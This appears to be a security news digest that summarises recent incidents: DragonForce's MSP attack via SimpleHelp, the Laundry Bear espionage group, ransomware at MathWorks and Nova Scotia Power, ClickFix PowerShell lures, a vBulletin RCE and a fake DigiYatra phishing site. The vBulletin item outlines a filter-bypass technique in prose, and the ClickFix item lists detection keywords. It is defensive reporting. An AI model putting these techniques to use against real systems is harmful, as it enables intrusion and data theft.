DragonForce is an advanced ransomware-as-a-service (RaaS) operation that emerged in mid-2023. DragonForce recently garnered attention in the threat landscape for claiming to “take over” the infrastructure of RansomHub. Reports also suggest that well-known ransomware affiliates, including Scattered Spider (UNC3944) who was formerly a RansomHub affiliate, have been using DragonForce in attacks targeting multiple large retail chains in the UK and the US. MSPs and their customers are advised to patch SimpleHelp instances immediately to prevent further exploitation.

Recommended read:
References :
  • Sophos News: Ransomware actor exploited RMM to access multiple organizations; Sophos EDR blocked encryption on customer’s network
  • bsky.app: The DragonForce ransomware operation successfully breached a managed service provider and used its SimpleHelp remote monitoring and management (RMM) platform to steal data and deploy encryptors on downstream customers' systems.
  • securityaffairs.com: DragonForce operator chained SimpleHelp flaws to target an MSP and its customers
  • www.bleepingcomputer.com: The DragonForce ransomware operation successfully breached a managed service provider and used its SimpleHelp remote monitoring and management (RMM) platform to steal data and deploy encryptors on downstream customers' systems.
  • BleepingComputer: DragonForce ransomware abuses SimpleHelp in MSP supply chain attack
  • BleepingComputer: DragonForce ransomware operation successfully breached a managed service provider and used its SimpleHelp remote monitoring and management (RMM) platform to steal data and deploy encryptors on downstream customers' systems.
  • The Register - Security: DragonForce double-whammy: First hit an MSP, then use RMM software to push ransomware
  • www.helpnetsecurity.com: Attackers hit MSP, use its RMM software to deliver ransomware to clients
  • Help Net Security: Attackers hit MSP, use its RMM software to deliver ransomware to clients
  • www.techradar.com: DragonForce ransomware hacks SimpleHelp RMM tool to attack MSPs
  • ciso2ciso.com: DragonForce double-whammy: First hit an MSP, then use RMM software to push ransomware – Source: go.theregister.com
  • Anonymous ???????? :af:: The ransomware operation successfully breached a managed service provider and used its SimpleHelp remote monitoring and management (RMM) platform to steal data
  • MicroScope: Sophos warns MSPs over DragonForce threat
  • Daily CyberSecurity: Details of RMM tool abused to spread DragonForce.
  • MSSP feed for Latest: DragonForce Ransomware Group Exploits MSP’s RMM Software in Attacks
  • thehackernews.com: DragonForce Exploits SimpleHelp Flaws to Deploy Ransomware Across Customer Endpoints
  • Tech Monitor: DragonForce exploits SimpleHelp in MSP breach
  • www.bleepingcomputer.com: DragonForce ransomware abuses SimpleHelp in MSP supply chain attack

@www.helpnetsecurity.com //
A newly identified Russian cyber-espionage group, known as Laundry Bear by Dutch intelligence and Void Blizzard by Microsoft, has been actively targeting Western organizations since at least April 2024. This group is believed to be backed by the Russian government and is primarily focused on gathering intelligence to support Russian strategic interests. Laundry Bear's targets include government entities, defense contractors, aerospace firms, and high-tech businesses in Europe and North America, particularly those supporting Ukraine. The group's activities suggest an interest in sensitive information related to military goods, weapons deliveries, and advanced technologies that are difficult for Russia to acquire due to Western sanctions.

The primary objective of Laundry Bear is to steal sensitive emails and files from compromised systems. They achieve this by targeting cloud-based email environments, specifically Microsoft Exchange. The group employs a range of techniques, including pass-the-cookie attacks, password spraying, and spear phishing aimed at credential theft. Notably, the Dutch intelligence services identified Laundry Bear during an investigation into a credential-stealing attack against the Dutch National Police in September 2024. During this attack, Laundry Bear gained access to an account belonging to a Dutch police employee by using a stolen session cookie to obtain work-related contact information of other police employees.

Microsoft has also observed Laundry Bear targeting critical sectors such as government, defense, transportation, media, NGOs, and healthcare, with a focus on organizations in Europe, North America, NATO member states, and Ukraine. The group frequently gains access by using stolen credentials, likely purchased from online marketplaces. Despite employing relatively simple attack methods and readily available tools, Laundry Bear has achieved a high success rate due to quick-paced cyber operations and efficient automation. Microsoft recommends organizations implement robust security measures to defend against such threats.

Recommended read:
References :
  • The Hacker News: Microsoft has shed light on a previously undocumented cluster of malicious activity originating from a Russia-affiliated threat actor dubbed Void Blizzard (aka Laundry Bear) that it said is attributed to worldwide cloud abuse.
  • www.helpnetsecurity.com: Microsoft, Dutch security agencies lift veil on Laundry Bear cyber espionage group
  • Threats | CyberScoop: New Russian state-sponsored APT quickly gains global reach, hitting expansive targets
  • therecord.media: Recent attacks on institutions in the Netherlands were the work of a previously unknown Russian hacking group that Dutch intelligence agencies are labeling Laundry Bear. Microsoft also reported on the group, naming it Void Blizzard.
  • www.microsoft.com: Microsoft Threat Intelligence has discovered a cluster of worldwide cloud abuse activity conducted by a threat actor we track as Void Blizzard, who we assess with high confidence is Russia-affiliated and has been active since at least April 2024.
  • www.defensie.nl: Onbekende Russische groep achter hacks Nederlandse doelen - Unknown Russian group behind hacks of Dutch targets - "is behind the hacks on several Dutch organizations, including the police in September 2024.
  • Help Net Security: Microsoft, Dutch security agencies lift veil on Laundry Bear cyber espionage group
  • thecyberexpress.com: New Russian Cyber Threat ‘Laundry Bear’ Hits Western Targets
  • www.csoonline.com: New Russian APT group Void Blizzard targets NATO-based orgs after infiltrating Dutch police
  • The Register - Security: New Russian cyber-spy crew Laundry Bear joins the email-stealing pack
  • securityonline.info: Void Blizzard: New Russian Cyberespionage Group Targets NATO and Ukraine
  • securityonline.info: Void Blizzard: New Russian Cyberespionage Group Targets NATO and Ukraine
  • securityaffairs.com: Russia-linked APT Laundry Bear linked to 2024 Dutch Police attack
  • industrialcyber.co: Microsoft details Void Blizzard as Russian cyber threat targeting global critical infrastructure
  • Virus Bulletin: Microsoft Threat Intelligence, in colaboration with Dutch security organizations AIVD & MIVD, observed Void Blizzard (a.k.a. LAUNDRY BEAR) conducting espionage operations primarily targeting organizations that are important to Russian government objectives.
  • Industrial Cyber: Microsoft details Void Blizzard as Russian cyber threat targeting global critical infrastructure
  • www.cybersecuritydive.com: Microsoft, Dutch government spot new Russian hacking group targeting critical infrastructure
  • Metacurity: Russian group Laundry Bear hacked Dutch police, targets Ukraine-allied nations
  • www.metacurity.com: Russian group Laundry Bear hacked Dutch police, targets Ukraine-allied nations
  • Vulnerable U: Void Blizzard hackers raid NATO cloud tenants with Evilginx phishing
  • Danny Palmer: A new Russian APT (LAUNDRY BEAR) is tearing through defence and government entities in NATO member states using stripped back and heavily automated threat techniques that nonetheless went widely undetected until they were spotted by the Dutch police, the Netherlands’s security services revealed.

@therecord.media //
MathWorks, the company behind the popular MATLAB software used by over five million people worldwide, has confirmed a ransomware attack that began on May 18, 2025. The attack disrupted online applications and internal systems, impacting licensing and access for users globally. The company has notified federal law enforcement and is working with cybersecurity experts to restore affected systems.

Commercial customers and STEM students have been significantly impacted by the prolonged outage. An IT manager at an engineering firm reported difficulties acquiring new licenses, hindering ongoing projects. Students also faced challenges, particularly with assessment tools like MATLAB Grader and Cody, which were only recently partially restored. Some frustrated users admitted to pirating the software due to the lack of access to the services they had paid for.

MathWorks has been issuing updates on its status page, initially citing technical issues before confirming the ransomware attack on May 26. While many systems are being brought back online, full recovery is still underway. The company has not yet disclosed details about the ransomware group responsible, whether a ransom was paid, or if data was exfiltrated.

Recommended read:
References :
  • The Dysruption Hub: MathWorks confirms ransomware attack disrupted MATLAB services starting May 18, impacting licensing and access for users worldwide.
  • The Register - Software: Commercial customers, STEM students all feeling the pain after mega outage of engineering data-analysis tool Software biz MathWorks is cleaning up a ransomware attack more than a week after it took down MATLAB, its flagship product used by more than five million people worldwide.
  • therecord.media: MathWorks — developer of MATLAB — has updated customers after initially reporting outages on May 18, confirming a ransomware attack that took down online applications and internal systems used by staff.
  • The Record: MathWorks — developer of MATLAB — has updated customers after initially reporting outages on May 18, confirming a ransomware attack that took down online applications and internal systems used by staff.
  • securebulletin.com: When the world’s engineers, scientists, and students logged in to MATLAB on May 18, 2025, many were met with silence—a digital void where powerful tools once lived.
  • bsky.app: MathWorks, a leading developer of mathematical computing and simulation software, has revealed that a recent ransomware attack is behind an ongoing service outage.
  • www.bleepingcomputer.com: MathWorks Blames Ransomware Attack for Ongoing Outages - BleepingComputer
  • BleepingComputer: MathWorks, a leading developer of mathematical computing and simulation software, has revealed that a recent ransomware attack is behind an ongoing service outage.
  • Doug Levin: Doug Levin: MathWorks experienced a ransomware attack.
  • Secure Bulletin: Ransomware attack in MathWorks outage that paralyzed MATLAB
  • DataBreaches.Net: MathWorks, Creator of MATLAB, Confirms Ransomware Attack
  • Blog: Confirmed: MathWorks outage due to ransomware attack

Puja Srivastava@Sucuri Blog //
Cybercriminals are increasingly employing sophisticated social engineering techniques to distribute malware, with a recent surge in attacks leveraging fake CAPTCHA prompts and AI-generated TikTok videos. These campaigns, collectively known as "ClickFix," manipulate users into executing malicious PowerShell commands, leading to system compromise and the installation of information-stealing malware. A notable example involves a fake Google Meet page hosted on compromised WordPress sites, which tricks visitors into copying and pasting a specific PowerShell command under the guise of fixing a "Microphone Permission Denied" error. Once executed, the command downloads a remote access trojan (RAT), granting attackers full control over the victim's system.

The ClickFix technique is also being amplified through AI-generated TikTok videos that promise free access to premium software like Windows, Microsoft Office, Spotify, and CapCut. These videos instruct users to run PowerShell scripts, which instead install Vidar and StealC malware, capable of stealing login credentials, credit card data, and 2FA codes. Trend Micro researchers note that the use of AI allows for rapid production and tailoring of these videos to target different user segments. These tactics have proven highly effective, with one video promising to "boost your Spotify experience instantly" amassing nearly 500,000 views.

Detecting and preventing ClickFix attacks requires a multi-faceted approach. Security experts recommend disabling the Windows Run program via Group Policy Objects (GPOs) or turning off the "Windows + R" hotkey. Additionally, users should exercise caution when encountering unsolicited technical instructions, verify the legitimacy of video sources, and avoid running PowerShell commands from untrusted sources. Monitoring for keywords like "not a robot," "captcha," "secure code," and "human" in process creation events can also help identify potential attacks. These measures, combined with public awareness, are crucial in mitigating the growing threat posed by ClickFix campaigns.

Recommended read:
References :
  • Sucuri Blog: Fake Google Meet Page Tricks Users into Running PowerShell Malware
  • securityonline.info: Fake Google Meet Page Tricks Users into Running Malware
  • gbhackers.com: How Google Meet Pages Are Exploited to Deliver PowerShell Malware
  • securityaffairs.com: Crooks use TikTok videos with fake tips to trick users into running commands that install Vidar and StealC malware in ClickFix attacks.
  • securityonline.info: Threat actors have ramped up a new social engineering campaign, dubbed “ClickFix,†where fake CAPTCHA prompts embedded in
  • Know Your Adversary: I think you at least heard about fake CAPTCHA attacks. Yes, ClickFix again. The thing is - adversaries use fake CAPTCHA pages to trick users into executing malicious commands in Windows.

@cyble.com //
Nova Scotia Power has officially confirmed it fell victim to a sophisticated ransomware attack, impacting approximately 280,000 customers. The breach, which began several weeks ago, involved unauthorized access to internal systems and the subsequent theft of sensitive data. The cyber incident targeted Nova Scotia Power’s digital infrastructure, encrypting critical systems and exfiltrating customer data. The power utility has confirmed it was hit by ransomware but hasn't paid the ransom, nearly a month after first disclosing the cyberattack.

Nova Scotia Power engaged third-party cybersecurity firms to isolate affected networks, mitigate further damage, and conduct forensic analyses. Investigations suggest the attackers employed advanced techniques to bypass existing safeguards, though specific details about the ransomware variant or entry vectors remain undisclosed. The company emphasized it did not comply with ransom demands, a decision it attributes to adherence to sanctions laws and coordination with law enforcement agencies.

The threat actor publicly released portions of the stolen data, compelling Nova Scotia Power to initiate a large-scale notification campaign. Impacted customers received physical mail detailing the breach’s scope and remediation steps. The compromised information reportedly includes names, addresses, account numbers, and potentially payment histories. To address identity theft risks, Nova Scotia Power partnered with TransUnion to offer affected individuals a two-year subscription to the myTrueIdentity® credit monitoring service at no cost, including real-time credit alerts and dark web surveillance.

Recommended read:
References :
  • thecyberexpress.com: Nova Scotia Power has confirmed it was the victim of a ransomware attack, weeks after initially alerting customers to a cybersecurity breach.
  • Tech Monitor: Nova Scotia Power confirms data breach, customer information compromised
  • cyberpress.org: Nova Scotia Power Confirms Cyberattack Affecting 280K Customers
  • securityaffairs.com: Nova Scotia Power confirms it was hit by a ransomware attack but hasn’t paid the ransom, nearly a month after first disclosing the cyberattack.
  • Cyber Security News: Nova Scotia Power, a key utility provider, faced a significant ransomware attack, which led to the leak of customer data and exposed sensitive information.

@securityonline.info //
A critical security vulnerability has been discovered in vBulletin forum software, tracked as CVE-2024-45721, that enables unauthenticated attackers to execute arbitrary code on unpatched systems. This flaw puts millions of online communities at risk of full server compromise. The vulnerability affects vBulletin versions 6.0.0 through 6.1.4 and stems from improper sanitization of user inputs in template rendering modules. Discovered by cybersecurity firm SentinelWatch on May 22, 2025, the flaw has already seen significant exploitation attempts, with over 12,000 attack vectors targeting forums in various sectors within 48 hours of public disclosure.

Exploitation of the vulnerability involves crafting malicious forum posts containing payloads that bypass built-in sandboxing through parameter smuggling techniques. Attackers leverage vBulletin’s `vb:rawtemplate` directive, which fails to properly validate nested function calls when processing user-generated content. Successful exploitation grants SYSTEM-level privileges on Windows hosts and www-data access on Linux systems, enabling the installation of web shells, credential harvesters, and cryptocurrency miners. Proof-of-concept exploits have demonstrated the ability to execute OS commands even when PHP security hardening measures are present, by using PHP's `unserialize()` function with crafted OPcache configurations to bypass `disable_functions` restrictions.

In response to the widespread exploitation, vBulletin released patch 6.1.5 on May 25, 2025, which introduces granular template validation. However, as of the latest reports, 68% of installations remain unupdated, leaving a significant number of forums vulnerable. Observed attack clusters include cryptojacking campaigns, data exfiltration, and precursors to ransomware attacks. Notably, 58% of compromised forums had hidden Monero miners installed, while attackers cloned user databases from 23 gaming communities containing 14 million records, now circulating on dark web markets. Additionally, six enterprise forums received tailored malware potentially leading to Black Basta ransomware deployment.

Recommended read:
References :
  • cyberpress.org: Severe vBulletin Forum Flaw Enables Remote Code Execution
  • securityonline.info: Critical Pre-Auth RCE: vBulletin Flaw Allows Full Server Compromise (PoC Available)
  • infosec.exchange: A newly discovered vulnerability in vBulletin, one of the world’s most popular forum platforms, has exposed thousands of online communities to the risk of unauthenticated Remote Code Execution
  • Cyber Security News: Severe vBulletin Forum Flaw Enables Remote Code Execution

MalBot@malware.news //
A fraudulent website, digiyatra[.]in, is actively targeting Indian air travelers by impersonating the official DigiYatra Foundation. Threat actors are exploiting the trust placed in India's digital infrastructure by setting up this deceptive phishing site. The website, which remains live at the time of reporting, is designed to harvest personal user data under the guise of providing official services for air travelers, mirroring a legitimate flight booking portal with a flight search box and user forms requesting names, phone numbers, and email addresses.

Despite the appearance of a genuine booking platform, the website does not facilitate any actual ticket sales or transactions. Instead, its sole purpose is data harvesting, enticing users to input Personally Identifiable Information (PII) by imitating a legitimate service experience. The site uses a free SSL certificate from Let's Encrypt to enhance its perceived legitimacy, further deceiving unsuspecting users. The domain was registered under the name Ali Sajil from Kerala, India, and is accessible through both its domain name and IP address (167[.]172[.]151[.]164).

The discovery of this phishing site poses significant risks, including unauthorized data collection, public deception, and potential reputational damage to the DigiYatra initiative. The site's ability to deceive users stems from its strategic use of keywords and the appearance of security through HTTPS. In response to this threat, ThreatWatch360 has taken immediate action, escalating the matter to CERT-In and submitting a takedown request to the domain registrar. Furthermore, alerts have been shared with brand protection clients, and monitoring for similar fraudulent attempts is ongoing, with DNS-level blocks advised for the domain and its IP address to prevent further abuse.

Recommended read:
References :
  • gbhackers.com: Fake DigiYatra Apps Target Indian Users to Steal Financial Data
  • infosecwriteups.com: Fake DigiYatra Website Was Targeting Indian Flyers With Lookalike Portal
  • malware.news: Fake DigiYatra Apps Target Indian Users to Steal Financial Data